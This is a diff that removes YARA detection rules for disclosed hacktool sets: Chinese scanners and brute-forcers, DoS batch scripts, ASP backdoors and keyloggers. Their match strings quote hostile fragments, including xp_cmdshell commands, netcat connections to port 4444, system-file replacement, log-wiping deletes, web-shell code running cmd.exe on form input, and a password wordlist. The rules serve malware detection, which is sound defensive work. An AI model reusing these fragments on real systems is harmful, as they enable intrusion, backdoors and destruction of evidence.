-rule Hacktools_CN_Burst_sql {
-	meta:
-		description = "Disclosed hacktool set - file sql.exe"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "d5139b865e99b7a276af7ae11b14096adb928245"
-	strings:
-		$s0 = "s.exe %s %s %s %s %d /save" fullword ascii
-		$s2 = "s.exe start error...%d" fullword ascii
-		$s4 = "EXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'" fullword ascii
-		$s7 = "EXEC master..xp_cmdshell 'wscript.exe cc.js'" fullword ascii
-		$s10 = "Result.txt" fullword ascii
-		$s11 = "Usage:sql.exe [options]" fullword ascii
-		$s17 = "%s root %s %d error" fullword ascii
-		$s18 = "Pass.txt" fullword ascii
-		$s20 = "SELECT sillyr_at_gmail_dot_com INTO DUMPFILE '%s\\\\sillyr_x.so' FROM sillyr_x" fullword ascii
-	condition:
-		6 of them
-}
-
-rule Hacktools_CN_JoHor_Rdos {
-	meta:
-		description = "Disclosed hacktool set - file spec.vbp"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "400a90c9eabeb94ae05e5036e21dc922b0c1ffad"
-	strings:
-		$s3 = "service@dywt.com.cn" fullword ascii
-		$s9 = "www.dywt.com.cn" fullword ascii
-		$s17 = "This is a runtime library file for EPL applications. The EPL is a software devel" ascii
-	condition:
-		2 of them
-}
-
-rule Hacktools_CN_Panda_445TOOL {
-	meta:
-		description = "Disclosed hacktool set - file 445TOOL.rar"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "92050ba43029f914696289598cf3b18e34457a11"
-	strings:
-		$s0 = "scan.bat" fullword ascii
-		$s1 = "Http.exe" fullword ascii
-		$s2 = "GOGOGO.bat" fullword ascii
-		$s3 = "ip.txt" fullword ascii
-	condition:
-		all of them
-}
-
-rule Hacktools_CN_Panda_445 {
-	meta:
-		description = "Disclosed hacktool set - file 445.rar"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "a61316578bcbde66f39d88e7fc113c134b5b966b"
-	strings:
-		$s0 = "for /f %%i in (ips.txt) do (start cmd.bat %%i)" fullword ascii
-		$s1 = "445\\nc.exe" fullword ascii
-		$s2 = "445\\s.exe" fullword ascii
-		$s3 = "cs.exe %1" fullword ascii
-		$s4 = "445\\cs.exe" fullword ascii
-		$s5 = "445\\ip.txt" fullword ascii
-		$s6 = "445\\cmd.bat" fullword ascii
-		$s9 = "@echo off" fullword ascii
-	condition:
-		all of them
-}
-
-rule Hacktools_CN_WinEggDrop {
-	meta:
-		description = "Disclosed hacktool set - file s.exe"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "7665011742ce01f57e8dc0a85d35ec556035145d"
-	strings:
-		$s0 = "Normal Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
-		$s2 = "SYN Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
-		$s6 = "Example: %s TCP 12.12.12.12 12.12.12.254 21 512 /Banner" fullword ascii
-		$s8 = "Something Wrong About The Ports" fullword ascii
-		$s9 = "Performing Time: %d/%d/%d %d:%d:%d --> " fullword ascii
-		$s10 = "Example: %s TCP 12.12.12.12/24 80 512 /T8 /Save" fullword ascii
-		$s12 = "%u Ports Scanned.Taking %d Threads " fullword ascii
-		$s13 = "%-16s %-5d -> \"%s\"" fullword ascii
-		$s14 = "SYN Scan Can Only Perform On WIN 2K Or Above" fullword ascii
-		$s17 = "SYN Scan: About To Scan %s:%d Using %d Thread" fullword ascii
-		$s18 = "Scan %s Complete In %d Hours %d Minutes %d Seconds. Found %u Open Ports" fullword ascii
-	condition:
-		5 of them
-}
-
-rule Hacktools_CN_Scan_BAT {
-	meta:
-		description = "Disclosed hacktool set - file scan.bat"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "6517d7c245f1300e42f7354b0fe5d9666e5ce52a"
-	strings:
-		$s0 = "for /f %%a in (host.txt) do (" fullword ascii
-		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
-		$s2 = "del host.txt /q" fullword ascii
-		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
-		$s4 = "start Http.exe %%a %http%" fullword ascii
-		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
-	condition:
-		5 of them
-}
-
-rule Hacktools_CN_Panda_Burst {
-	meta:
-		description = "Disclosed hacktool set - file Burst.rar"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "ce8e3d95f89fb887d284015ff2953dbdb1f16776"
-	strings:
-		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr." ascii
-	condition:
-		all of them
-}
-
-rule Hacktools_CN_445_cmd {
-	meta:
-		description = "Disclosed hacktool set - file cmd.bat"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "69b105a3aec3234819868c1a913772c40c6b727a"
-	strings:
-		$bat = "@echo off" fullword ascii
-		$s0 = "cs.exe %1" fullword ascii
-		$s2 = "nc %1 4444" fullword ascii
-	condition:
-		$bat at 0 and all of ($s*)
-}
-
-rule Hacktools_CN_GOGOGO_Bat {
-	meta:
-		description = "Disclosed hacktool set - file GOGOGO.bat"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "4bd4f5b070acf7fe70460d7eefb3623366074bbd"
-	strings:
-		$s0 = "for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%x" fullword ascii
-		$s1 = "http://www.tzddos.com/ -------------------------------------------->byebye.txt" fullword ascii
-		$s2 = "ren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bak" fullword ascii
-		$s4 = "IF /I \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )" fullword ascii
-		$s5 = "copy *.tzddos scan.bat&del *.tzddos" fullword ascii
-		$s6 = "del /f tcpip.sys" fullword ascii
-		$s9 = "if /i \"%CB%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )" fullword ascii
-		$s10 = "call scan.bat" fullword ascii
-		$s12 = "IF /I \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )" fullword ascii
-		$s13 = "IF /I \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )" fullword ascii
-		$s18 = "sc config LmHosts start= auto" fullword ascii
-		$s19 = "copy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nul" fullword ascii
-		$s20 = "ren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak" fullword ascii
-	condition:
-		3 of them
-}
-
-rule Hacktools_CN_Burst_pass {
-	meta:
-		description = "Disclosed hacktool set - file pass.txt"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "55a05cf93dbd274355d798534be471dff26803f9"
-	strings:
-		$s0 = "123456.com" fullword ascii
-		$s1 = "123123.com" fullword ascii
-		$s2 = "360.com" fullword ascii
-		$s3 = "123.com" fullword ascii
-		$s4 = "juso.com" fullword ascii
-		$s5 = "sina.com" fullword ascii
-		$s7 = "changeme" fullword ascii
-		$s8 = "master" fullword ascii
-		$s9 = "google.com" fullword ascii
-		$s10 = "chinanet" fullword ascii
-		$s12 = "lionking" fullword ascii
-	condition:
-		all of them
-}
-
-rule Hacktools_CN_JoHor_Posts_Killer {
-	meta:
-		description = "Disclosed hacktool set - file JoHor_Posts_Killer.exe"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "d157f9a76f9d72dba020887d7b861a05f2e56b6a"
-	strings:
-		$s0 = "Multithreading Posts_Send Killer" fullword ascii
-		$s3 = "GET [Access Point] HTTP/1.1" fullword ascii
-		$s6 = "The program's need files was not exist!" fullword ascii
-		$s7 = "JoHor_Posts_Killer" fullword wide
-		$s8 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
-		$s10 = "  ( /s ) :" fullword ascii
-		$s11 = "forms.vbp" fullword ascii
-		$s12 = "forms.vcp" fullword ascii
-		$s13 = "Software\\FlySky\\E\\Install" fullword ascii
-	condition:
-		5 of them
-}
-
-rule Hacktools_CN_JoHor_Rdos_3_6_uplis {
-	meta:
-		description = "Disclosed hacktool set - file uplis.vbp"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "a87d00d78838c2d968b72330ee6f21f69b2caae5"
-	strings:
-		$s0 = "http://dywt.com.cn" fullword ascii
-		$s1 = "service@dywt.com.cn" fullword ascii
-		$s4 = "GetNewInf" fullword ascii
-		$s5 = "This is a runtime library file for EPL applications. The EPL is a software devel" ascii
-		$s8 = "yiyuyan" fullword ascii
-	condition:
-		4 of them
-}
-
-rule Hacktools_CN_Panda_tesksd {
-	meta:
-		description = "Disclosed hacktool set - file tesksd.jpg"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "922147b3e1e6cf1f5dd5f64a4e34d28bdc9128cb"
-	strings:
-		$s0 = "name=\"Microsoft.Windows.Common-Controls\" " fullword ascii
-		$s1 = "ExeMiniDownload.exe" fullword wide
-		$s16 = "POST %Hs" fullword ascii
-	condition:
-		all of them
-}
-
-rule Hacktools_CN_Panda_k {
-	meta:
-		description = "Disclosed hacktool set - file k.exe"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "8d1170df533238ac2da7826bd8997917be1e1517"
-	strings:
-		$s0 = "(http://www.eyuyan.com)" fullword wide
-		$s1 = "trin" fullword wide
-		$s2 = "FAUL" fullword wide
-		$s10 = " program must be run " fullword ascii
-	condition:
-		all of them
-}
-
-rule Hacktools_CN_Http {
-	meta:
-		description = "Disclosed hacktool set - file Http.exe"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "788bf0fdb2f15e0c628da7056b4e7b1a66340338"
-	strings:
-		$s0 = "RPCRT4.DLL" fullword ascii
-		$s1 = "WNetAddConnection2A" fullword ascii
-		$s2 = "NdrPointerBufferSize" fullword ascii
-		$s3 = "_controlfp" fullword ascii
-	condition:
-		all of them and filesize < 10KB
-}
-
-rule Hacktools_CN_JoHor_Rdos_get {
-	meta:
-		description = "Disclosed hacktool set - file get.vbp"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "09c32ca167136a17fd69df8c525ea5ffeca6c534"
-	strings:
-		$s1 = "http://dywt.com.cn" fullword ascii
-		$s2 = "service@dywt.com.cn" fullword ascii
-		$s3 = "Uncompress" fullword ascii
-		$s5 = "GetNewInf" fullword ascii
-		$s6 = "This is a runtime library file for EPL applications. The EPL is a software devel" ascii
-		$s10 = "GetMD5" fullword ascii
-		$s12 = "RSACheck" fullword ascii
-	condition:
-		all of them
-}
-
-rule Hacktools_CN_JoHor_Rdos_LineExp {
-	meta:
-		description = "Disclosed hacktool set - file LineExp.vbp"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "1bd2db477c68cdcba9ae5c3668bd76c51fc12d2e"
-	strings:
-		$s0 = "http://dywt.com.cn" fullword ascii
-		$s1 = "service@dywt.com.cn" fullword ascii
-		$s2 = "EThread.fne" fullword ascii
-		$s3 = "GetNewInf" fullword ascii
-		$s4 = "This is a runtime library file for EPL applications. The EPL is a software devel" ascii
-		$s5 = "CloseThreadHandle" fullword ascii
-		$s6 = "WaitThread" fullword ascii
-		$s8 = "CreateCriticalSection" fullword ascii
-	condition:
-		all of them
-}
-
-rule Hacktools_CN_Burst_Start {
-	meta:
-		description = "Disclosed hacktool set - file Start.bat - DoS tool"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "75d194d53ccc37a68286d246f2a84af6b070e30c"
-	strings:
-		$s0 = "for /f \"eol= tokens=1,2 delims= \" %%i in (ip.txt) do (" fullword ascii
-		$s1 = "Blast.bat /r 600" fullword ascii
-		$s2 = "Blast.bat /l Blast.bat" fullword ascii
-		$s3 = "Blast.bat /c 600" fullword ascii
-		$s4 = "start Clear.bat" fullword ascii
-		$s5 = "del Result.txt" fullword ascii
-		$s6 = "s syn %%i %%j 3306 /save" fullword ascii
-		$s7 = "start Thecard.bat" fullword ascii
-		$s10 = "setlocal enabledelayedexpansion" fullword ascii
-	condition:
-		5 of them
-}
-
-rule Hacktools_CN_Panda_tasksvr {
-	meta:
-		description = "Disclosed hacktool set - file tasksvr.exe"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "a73fc74086c8bb583b1e3dcfd326e7a383007dc0"
-	strings:
-		$s2 = "Consys21.dll" fullword ascii
-		$s4 = "360EntCall.exe" fullword wide
-		$s15 = "Beijing1" fullword ascii
-	condition:
-		all of them
-}
-rule Hacktools_CN_Burst_Clear {
-	meta:
-		description = "Disclosed hacktool set - file Clear.bat"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "148c574a4e6e661aeadaf3a4c9eafa92a00b68e4"
-	strings:
-		$s0 = "del /f /s /q %systemdrive%\\*.log    " fullword ascii
-		$s1 = "del /f /s /q %windir%\\*.bak    " fullword ascii
-		$s4 = "del /f /s /q %systemdrive%\\*.chk    " fullword ascii
-		$s5 = "del /f /s /q %systemdrive%\\*.tmp    " fullword ascii
-		$s8 = "del /f /q %userprofile%\\COOKIES s\\*.*    " fullword ascii
-		$s9 = "rd /s /q %windir%\\temp & md %windir%\\temp    " fullword ascii
-		$s11 = "del /f /s /q %systemdrive%\\recycled\\*.*    " fullword ascii
-		$s12 = "del /f /s /q \"%userprofile%\\Local Settings\\Temp\\*.*\"    " fullword ascii
-		$s19 = "del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\"   " ascii
-	condition:
-		5 of them
-}
-
-rule Hacktools_CN_Panda_andrew {
-	meta:
-		description = "Disclosed hacktool set - file andrew.exe - sethc.exe Debugger backdoor"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "abd03ebb08314297b83e6c795cc85bb85e1f4d71"
-	strings:
-		$s0 = "(http://www.eyuyan.com)" fullword wide
-		$s1 = "ClosePrinter" fullword ascii
-		$s18 = "version=\"1.0\" encoding" fullword ascii
-	condition:
-		all of them
-}
-
-rule Hacktools_CN_Burst_Thecard {
-	meta:
-		description = "Disclosed hacktool set - file Thecard.bat"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "50b01ea0bfa5ded855b19b024d39a3d632bacb4c"
-	strings:
-		$s0 = "tasklist |find \"Clear.bat\"||start Clear.bat" fullword ascii
-		$s1 = "Http://www.coffeewl.com" fullword ascii
-		$s2 = "ping -n 2 localhost 1>nul 2>nul" fullword ascii
-		$s3 = "for /L %%a in (" fullword ascii
-		$s4 = "MODE con: COLS=42 lines=5" fullword ascii
-	condition:
-		all of them
-}
-
-rule Hacktools_CN_Burst_Blast {
-	meta:
-		description = "Disclosed hacktool set - file Blast.bat"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "b07702a381fa2eaee40b96ae2443918209674051"
-	strings:
-		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http:" ascii
-		$s1 = "@echo off" fullword ascii
-	condition:
-		all of them
-}
-
-rule VUBrute_VUBrute {
-	meta:
-		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file VUBrute.exe"
-		author = "Florian Roth"
-		date = "22.11.14"
-		score = 70
-		hash = "166fa8c5a0ebb216c832ab61bf8872da556576a7"
-	strings:
-		$s0 = "Text Files (*.txt);;All Files (*)" fullword ascii
-		$s1 = "http://ubrute.com" fullword ascii
-		$s11 = "IP - %d; Password - %d; Combination - %d" fullword ascii
-		$s14 = "error.txt" fullword ascii
-	condition:
-		all of them
-}
-
-rule DK_Brute {
-	meta:
-		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file DK Brute.exe"
-		author = "Florian Roth"
-		date = "22.11.14"
-		score = 70
-		reference = "http://goo.gl/xiIphp"
-		hash = "93b7c3a01c41baecfbe42461cb455265f33fbc3d"
-	strings:
-		$s6 = "get_CrackedCredentials" fullword ascii
-		$s13 = "Same port used for two different protocols:" fullword wide
-		$s18 = "coded by fLaSh" fullword ascii
-		$s19 = "get_grbToolsScaningCracking" fullword ascii
-	condition:
-		all of them
-}
-
-rule VUBrute_config {
-	meta:
-		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file config.ini"
-		author = "Florian Roth"
-		date = "22.11.14"
-		score = 70
-		reference = "http://goo.gl/xiIphp"
-		hash = "b9f66b9265d2370dab887604921167c11f7d93e9"
-	strings:
-		$s2 = "Restore=1" fullword ascii
-		$s6 = "Thread=" ascii
-		$s7 = "Running=1" fullword ascii
-		$s8 = "CheckCombination=" fullword ascii
-		$s10 = "AutoSave=1.000000" fullword ascii
-		$s12 = "TryConnect=" ascii
-		$s13 = "Tray=" ascii
-	condition:
-		all of them
-}
-
-rule sig_238_hunt {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file hunt.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "f9f059380d95c7f8d26152b1cb361d93492077ca"
-	strings:
-		$s1 = "Programming by JD Glaser - All Rights Reserved" fullword ascii
-		$s3 = "Usage - hunt \\\\servername" fullword ascii
-		$s4 = ".share = %S - %S" fullword wide
-		$s5 = "SMB share enumerator and admin finder " fullword ascii
-		$s7 = "Hunt only runs on Windows NT..." fullword ascii
-		$s8 = "User = %S" fullword ascii
-		$s9 = "Admin is %s\\%s" fullword ascii
-	condition:
-		all of them
-}
-
-rule sig_238_listip {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file listip.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "f32a0c5bf787c10eb494eb3b83d0c7a035e7172b"
-	strings:
-		$s0 = "ERROR!!! Bad host lookup. Program Terminate." fullword ascii
-		$s2 = "ERROR No.2!!! Program Terminate." fullword ascii
-		$s4 = "Local Host Name: %s" fullword ascii
-		$s5 = "Packed by exe32pack 1.38" fullword ascii
-		$s7 = "Local Computer Name: %s" fullword ascii
-		$s8 = "Local IP Adress: %s" fullword ascii
-	condition:
-		all of them
-}
-
-rule ArtTrayHookDll {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file ArtTrayHookDll.dll"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "4867214a3d96095d14aa8575f0adbb81a9381e6c"
-	strings:
-		$s0 = "ArtTrayHookDll.dll" fullword ascii
-		$s7 = "?TerminateHook@@YAXXZ" fullword ascii
-	condition:
-		all of them
-}
-
-rule sig_238_eee {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file eee.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "236916ce2980c359ff1d5001af6dacb99227d9cb"
-	strings:
-		$s0 = "szj1230@yesky.com" fullword wide
-		$s3 = "C:\\Program Files\\DevStudio\\VB\\VB5.OLB" fullword ascii
-		$s4 = "MailTo:szj1230@yesky.com" fullword wide
-		$s5 = "Command1_Click" fullword ascii
-		$s7 = "software\\microsoft\\internet explorer\\typedurls" fullword wide
-		$s11 = "vb5chs.dll" fullword ascii
-		$s12 = "MSVBVM50.DLL" fullword ascii
-	condition:
-		all of them
-}
-
-rule aspbackdoor_asp4 {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file asp4.txt"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "faf991664fd82a8755feb65334e5130f791baa8c"
-	strings:
-		$s0 = "system.dll" fullword ascii
-		$s2 = "set sys=server.CreateObject (\"system.contral\") " fullword ascii
-		$s3 = "Public Function reboot(atype As Variant)" fullword ascii
-		$s4 = "t& = ExitWindowsEx(1, atype)" ascii
-		$s5 = "atype=request(\"atype\") " fullword ascii
-		$s7 = "AceiveX dll" fullword ascii
-		$s8 = "Declare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal " ascii
-		$s10 = "sys.reboot(atype)" fullword ascii
-	condition:
-		all of them
-}
-
-rule aspfile1 {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file aspfile1.asp"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "77b1e3a6e8f67bd6d16b7ace73dca383725ac0af"
-	strings:
-		$s0 = "' -- check for a command that we have posted -- '" fullword ascii
-		$s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword ascii
-		$s5 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"><BODY>" fullword ascii
-		$s6 = "<input type=text name=\".CMD\" size=45 value=\"<%= szCMD %>\">" fullword ascii
-		$s8 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword ascii
-		$s15 = "szCMD = Request.Form(\".CMD\")" fullword ascii
-	condition:
-		3 of them
-}
-
-rule EditServer {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file EditServer.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "87b29c9121cac6ae780237f7e04ee3bc1a9777d3"
-	strings:
-		$s0 = "%s Server.exe" fullword ascii
-		$s1 = "Service Port: %s" fullword ascii
-		$s2 = "The Port Must Been >0 & <65535" fullword ascii
-		$s8 = "3--Set Server Port" fullword ascii
-		$s9 = "The Server Password Exceeds 32 Characters" fullword ascii
-		$s13 = "Service Name: %s" fullword ascii
-		$s14 = "Server Password: %s" fullword ascii
-		$s17 = "Inject Process Name: %s" fullword ascii
-		
-		$x1 = "WinEggDrop Shell Congirator" fullword ascii
-	condition:
-		5 of ($s*) or $x1 
-}
-
-rule sig_238_letmein {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file letmein.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "74d223a56f97b223a640e4139bb9b94d8faa895d"
-	strings:
-		$s1 = "Error get globalgroup memebers: NERR_InvalidComputer" fullword ascii
-		$s6 = "Error get users from server!" fullword ascii
-		$s7 = "get in nt by name and null" fullword ascii
-		$s16 = "get something from nt, hold by killusa." fullword ascii
-	condition:
-		all of them
-}
-
-rule sig_238_token {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file token.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "c52bc6543d4281aa75a3e6e2da33cfb4b7c34b14"
-	strings:
-		$s0 = "Logon.exe" fullword ascii
-		$s1 = "Domain And User:" fullword ascii
-		$s2 = "PID=Get Addr$(): One" fullword ascii
-		$s3 = "Process " fullword ascii
-		$s4 = "psapi.dllK" fullword ascii
-	condition:
-		all of them
-}
-
-rule sig_238_TELNET {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file TELNET.EXE from Windows ME"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "50d02d77dc6cc4dc2674f90762a2622e861d79b1"
-	strings:
-		$s0 = "TELNET [host [port]]" fullword wide
-		$s2 = "TELNET.EXE" fullword wide
-		$s4 = "Microsoft(R) Windows(R) Millennium Operating System" fullword wide
-		$s14 = "Software\\Microsoft\\Telnet" fullword wide
-	condition:
-		all of them
-}
-
-rule snifferport {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file snifferport.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "d14133b5eaced9b7039048d0767c544419473144"
-	strings:
-		$s0 = "iphlpapi.DLL" fullword ascii
-		$s5 = "ystem\\CurrentCorolSet\\" fullword ascii
-		$s11 = "Port.TX" fullword ascii
-		$s12 = "32Next" fullword ascii
-		$s13 = "V1.2 B" fullword ascii
-	condition:
-		all of them
-}
-
-rule sig_238_webget {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file webget.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "36b5a5dee093aa846f906bbecf872a4e66989e42"
-	strings:
-		$s0 = "Packed by exe32pack" ascii
-		$s1 = "GET A HTTP/1.0" fullword ascii
-		$s2 = " error " fullword ascii
-		$s13 = "Downloa" ascii
-	condition:
-		all of them
-}
-
-rule XYZCmd_zip_Folder_XYZCmd {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file XYZCmd.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "bbea5a94950b0e8aab4a12ad80e09b630dd98115"
-	strings:
-		$s0 = "Executes Command Remotely" fullword wide
-		$s2 = "XYZCmd.exe" fullword wide
-		$s6 = "No Client Software" fullword wide
-		$s19 = "XYZCmd V1.0 For NT S" fullword ascii
-	condition:
-		all of them
-}
-
-rule ASPack_Chinese {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file ASPack Chinese.ini"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "02a9394bc2ec385876c4b4f61d72471ac8251a8e"
-	strings:
-		$s0 = "= Click here if you want to get your registered copy of ASPack" fullword ascii
-		$s1 = ";  For beginning of translate - copy english.ini into the yourlanguage.ini" fullword ascii
-		$s2 = "E-Mail:                      shinlan@km169.net" fullword ascii
-		$s8 = ";  Please, translate text only after simbol '='" fullword ascii
-		$s19 = "= Compress with ASPack" fullword ascii
-	condition:
-		all of them
-}
-
-rule aspbackdoor_EDIR {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file EDIR.ASP"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "03367ad891b1580cfc864e8a03850368cbf3e0bb"
-	strings:
-		$s1 = "response.write \"<a href='index.asp'>" fullword ascii
-		$s3 = "if Request.Cookies(\"password\")=\"" ascii
-		$s6 = "whichdir=server.mappath(Request(\"path\"))" fullword ascii
-		$s7 = "Set fs = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
-		$s19 = "whichdir=Request(\"path\")" fullword ascii
-	condition:
-		all of them
-}
-
-rule sig_238_filespy {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file filespy.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 50
-		hash = "89d8490039778f8c5f07aa7fd476170293d24d26"
-	strings:
-		$s0 = "Hit [Enter] to begin command mode..." fullword ascii
-		$s1 = "If you are in command mode," fullword ascii
-		$s2 = "[/l] lists all the drives the monitor is currently attached to" fullword ascii
-		$s9 = "FileSpy.exe" fullword wide
-		$s12 = "ERROR starting FileSpy..." fullword ascii
-		$s16 = "exe\\filespy.dbg" fullword ascii
-		$s17 = "[/d <drive>] detaches monitor from <drive>" fullword ascii
-		$s19 = "Should be logging to screen..." fullword ascii
-		$s20 = "Filmon:  Unknown log record type" fullword ascii
-	condition:
-		7 of them
-}
-
-rule ByPassFireWall_zip_Folder_Ie {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file Ie.dll"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "d1b9058f16399e182c9b78314ad18b975d882131"
-	strings:
-		$s0 = "d:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dll" fullword ascii
-		$s1 = "LOADER ERROR" fullword ascii
-		$s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
-		$s7 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
-	condition:
-		all of them
-}
-
-rule EditKeyLogReadMe {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file EditKeyLogReadMe.txt"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "dfa90540b0e58346f4b6ea12e30c1404e15fbe5a"
-	strings:
-		$s0 = "editKeyLog.exe KeyLog.exe," fullword ascii
-		$s1 = "WinEggDrop.DLL" fullword ascii
-		$s2 = "nc.exe" fullword ascii
-		$s3 = "KeyLog.exe" fullword ascii
-		$s4 = "EditKeyLog.exe" fullword ascii
-		$s5 = "wineggdrop" fullword ascii
-	condition:
-		3 of them
-}
-
-rule PassSniffer_zip_Folder_readme {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file readme.txt"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "a52545ae62ddb0ea52905cbb61d895a51bfe9bcd"
-	strings:
-		$s0 = "PassSniffer.exe" fullword ascii
-		$s1 = "POP3/FTP Sniffer" fullword ascii
-		$s2 = "Password Sniffer V1.0" fullword ascii
-	condition:
-		1 of them
-}
-
-rule sig_238_gina {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file gina.reg"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "324acc52566baf4afdb0f3e4aaf76e42899e0cf6"
-	strings:
-		$s0 = "\"gina\"=\"gina.dll\"" fullword ascii
-		$s1 = "REGEDIT4" fullword ascii
-		$s2 = "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]" fullword ascii
-	condition:
-		all of them
-}
-
-rule splitjoin {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "e4a9ef5d417038c4c76b72b5a636769a98bd2f8c"
-	strings:
-		$s0 = "Not for distribution without the authors permission" fullword wide
-		$s2 = "Utility to split and rejoin files.0" fullword wide
-		$s5 = "Copyright (c) Angus Johnson 2001-2002" fullword wide
-		$s19 = "SplitJoin" fullword wide
-	condition:
-		all of them
-}
-
-rule EditKeyLog {
-	meta:
-		description = "Disclosed hacktool set (old stuff) - file EditKeyLog.exe"
-		author = "Florian Roth"
-		date = "23.11.14"
-		score = 60
-		hash = "a450c31f13c23426b24624f53873e4fc3777dc6b"
-	strings:
-		$s1 = "Press Any Ke" fullword ascii
-		$s2 = "Enter 1 O" fullword ascii
